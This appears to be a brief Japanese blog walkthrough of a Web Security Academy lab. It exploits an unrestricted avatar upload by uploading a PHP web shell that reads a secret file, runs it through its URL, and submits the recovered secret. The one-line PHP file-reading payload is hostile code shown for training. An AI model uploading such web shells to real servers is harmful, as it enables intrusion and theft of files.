Hello there, ('ω')ノ
Webシェルアップロードによるリモートコード実行を。
まずは、ログインして。
テスト用の悪意のあるファイルを作成しておいてからアップロードして。
exploit.php
<?php echo file_get_contents('/home/carlos/secret'); ?>
正常にavatarsの下にアップロードできたようで。
ソースコードからどこにアップロードされたかを確認して。
/files/avatars/exploit.php
アップロードされたファイルに直接アクセスするとPHPが実行されて。
https://aca41fec1ef0e0fbc03ff741004f009f.web-security-academy.net/files/avatars/exploit.php
取得したコードを入力すると。
mHtjk1Weh4weDq7xyCMXSrtwONX05CKt
クリアできて。
Best regards, (^^ゞ